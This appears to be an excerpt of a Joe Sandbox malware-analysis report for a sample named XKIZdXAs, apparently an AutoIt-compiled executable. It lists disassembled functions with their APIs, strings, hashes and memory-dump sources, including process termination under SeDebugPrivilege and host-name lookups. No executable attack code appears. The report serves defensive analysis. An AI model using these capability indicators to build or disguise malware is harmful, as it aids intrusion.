                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadMessageModuleStringwprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                          • API String ID: 4007322891-4153970271
                                                                          • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                          • Instruction ID: 37af7d8a05b775f243fe345692a76fde5852fc3d84ed75e1081afb351a05c0ad
                                                                          • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                          • Instruction Fuzzy Hash: EE317431A1EA869ADB10FB11E4456EDA360FF44B84FC24032EA4D436A9EF7CD507CB50
                                                                          Function 00007FF7ADC6E1AC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 2573188126-1403004172
                                                                          • Opcode ID: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                          • Instruction ID: 41ac8c40dfa39d48b7c744e7b192d9bb1ee66377e48c7451d70e7d3cf6f46993
                                                                          • Opcode Fuzzy Hash: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                          • Instruction Fuzzy Hash: A931C425B0EA818AEB10BB21E9541B9A361FF88BD0FC54231DA9D037A5EE2CD506C760
                                                                          Function 00007FF7ADC6E08C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 2573188126-1403004172
                                                                          • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                          • Instruction ID: 5813a63a8eacf22cfc12f57b62b6b4c56204e084dd444c8d3e43f4277d6b0cd9
                                                                          • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                          • Instruction Fuzzy Hash: F131A835B0E68185EB10BB11E9141B9A361FF89BE0FC54331DAAD477E5EE3CD5068760
                                                                          Function 00007FF7ADC7CA98 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          • API String ID: 2479661705-3771769585
                                                                          • Opcode ID: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                                          • Instruction ID: 4aebf15386565b36e4d178d5c42cfa46ab1f59e2a9f88ac39559ac2fbd3db3d4
                                                                          • Opcode Fuzzy Hash: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                                          • Instruction Fuzzy Hash: 10217F21A0E94389EE20BB11E5443B9E360EF84B80FC24131D54D07AB5FE3CD546C724
                                                                          Function 00007FF7ADCB0D7C Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                          • String ID:
                                                                          • API String ID: 2672075419-0
                                                                          • Opcode ID: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                                          • Instruction ID: 5a1f8c0d3b694c7cafa05949dd189a13cb5011e1b47dd3dac75ba144412b2372
                                                                          • Opcode Fuzzy Hash: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                                          • Instruction Fuzzy Hash: BC919236B0E6529EEB50AF65D4403BDA3A1FB45B88FD24035DE4D436A9EE38E4079720
                                                                          Function 00007FF7ADC6E908 Relevance: 15.1, APIs: 10, Instructions: 59keyboardsleepwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                          • String ID:
                                                                          • API String ID: 685491774-0
                                                                          • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                          • Instruction ID: ea9349ebfcaec9aeb40d3e4fb7adb25c196bb5a50fb6e9daf69c4b4960d39e62
                                                                          • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                          • Instruction Fuzzy Hash: 9211D234B1E54286F754BB76A85856D6261EFCCB80FC29539C90E4BB60EE3DD0468320
                                                                          Function 00007FF7ADC9767C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Init$Clear
                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                          • API String ID: 3467423407-1765764032
                                                                          • Opcode ID: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                          • Instruction ID: 22a7b5a5671a8100957442527eb71959b6a5a6443e49f71bab83bd7bc0365f56
                                                                          • Opcode Fuzzy Hash: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                          • Instruction Fuzzy Hash: 47A18132A0AB518AEB10AF65E4406ADB7A1FB84B98FD60131EE4D077A4FF3CD546C750
                                                                          Function 00007FF7ADCAA350 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                          • String ID: -----$SysListView32
                                                                          • API String ID: 2361508679-3975388722
                                                                          • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                          • Instruction ID: ae214ebf15ecd2de930cfef7e09103a7dfa8aa3a1856681f79e88ad14e8ca2f0
                                                                          • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                          • Instruction Fuzzy Hash: 8251D432A197818EE720DF25D8446DD73A5FB84784F81013AEE4C47B65DF38DA55CB40
                                                                          Function 00007FF7ADC6E2CC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 54windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                          • API String ID: 2019164449-3381328864
                                                                          • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                          • Instruction ID: 18a9858fe591f37fbab5a4135ae9d7780ed818a95fdb1330a8a1b762664c084d
                                                                          • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                          • Instruction Fuzzy Hash: A2218125B1E54388FF50BB21EA542B9A364EF85BC4FC29136D94D472B5FE2CE1038721
                                                                          Function 00007FF7ADC97054 Relevance: 13.9, APIs: 9, Instructions: 373COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                          • String ID:
                                                                          • API String ID: 1903627254-0
                                                                          • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                          • Instruction ID: bd77984eb87ddc7f582a2501ad0ab42861b547f24162b268096d97de8cffdb49
                                                                          • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                          • Instruction Fuzzy Hash: 03026F62A0EA968ADB50EF29D4442BDA761FB84B94F914032EE4E077B4EF3CD546C710
                                                                          Function 00007FF7ADCAC324 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                          • String ID:
                                                                          • API String ID: 3210457359-0
                                                                          • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                          • Instruction ID: ac5a6921c78d291415ec0a342e12ec5fe34dcb271477fff529d89e77a2a9172b
                                                                          • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                          • Instruction Fuzzy Hash: 1861C129A0E6438EEB74BA6585407BA9252EB80794FD24931DA1D036F5EE7CE4439320
                                                                          Function 00007FF7ADCB0B24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                          • API String ID: 3721556410-2107944366
                                                                          • Opcode ID: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                                          • Instruction ID: aa140170e8121928d3b5907cb2e97a5f5c88937b7899c45e207093075dbdfc85
                                                                          • Opcode Fuzzy Hash: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                                          • Instruction Fuzzy Hash: 6D61A126A1AA529DEB00EF61E8905EDB771FB48B88FD21132ED0D136B5EF38D546C350
                                                                          Function 00007FF7ADC9E580 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                          • String ID: SeDebugPrivilege
                                                                          • API String ID: 2533919879-2896544425
                                                                          • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                          • Instruction ID: 3727c9b2f8033f3c2d321a93e7f9e75e3209412908b71badb779aa44b7248cdf
                                                                          • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                          • Instruction Fuzzy Hash: 6E517462A0E6568AEB10FB55C09037DA761FF94B90FC68431D60D077A2FF7CE4028B20
                                                                          Function 00007FF7ADC7A070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                          • String ID: 2$P
                                                                          • API String ID: 93392585-1110268094
                                                                          • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                          • Instruction ID: dff6ae1d7bb2f1c0785ad61cfd962bb88cab4732c89a3bdadc57e35414147923
                                                                          • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                          • Instruction Fuzzy Hash: 0C51D432A0E6428EF714AF65E44027DB7A1FB04B54FE64135DA5D936A4EF38D5828B20
                                                                          Function 00007FF7ADCAE248 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$LongMessageSend$Show
                                                                          • String ID: '
                                                                          • API String ID: 257662517-1997036262
                                                                          • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                          • Instruction ID: 61ba62d0321f012a4c58ed74b23107eaf1efbe6b9732fa0fae2e45321a6683dc
                                                                          • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                          • Instruction Fuzzy Hash: 60510836B0E64289E360AB65945467DA756FB85B90FD64931CE5E037B0EE3CE843C350
                                                                          Function 00007FF7ADC7AD94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoad_invalid_parameter_noinfo
                                                                          • String ID: blank$info$question$stop$warning
                                                                          • API String ID: 4060274358-404129466
                                                                          • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                          • Instruction ID: 8e8a7d32d8e7dcb5ba65f9ca1f3c64a3a444bd3fad682be71de6951c1b4a5380
                                                                          • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                          • Instruction Fuzzy Hash: 11215E25E0E78389FB54BB16A9001BAE365EF44B90FC65031DD4D823B5FE7CE5538620
                                                                          Function 00007FF7ADC7C5C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString$Messagewprintf
                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                          • API String ID: 4051287042-3128320259
                                                                          • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
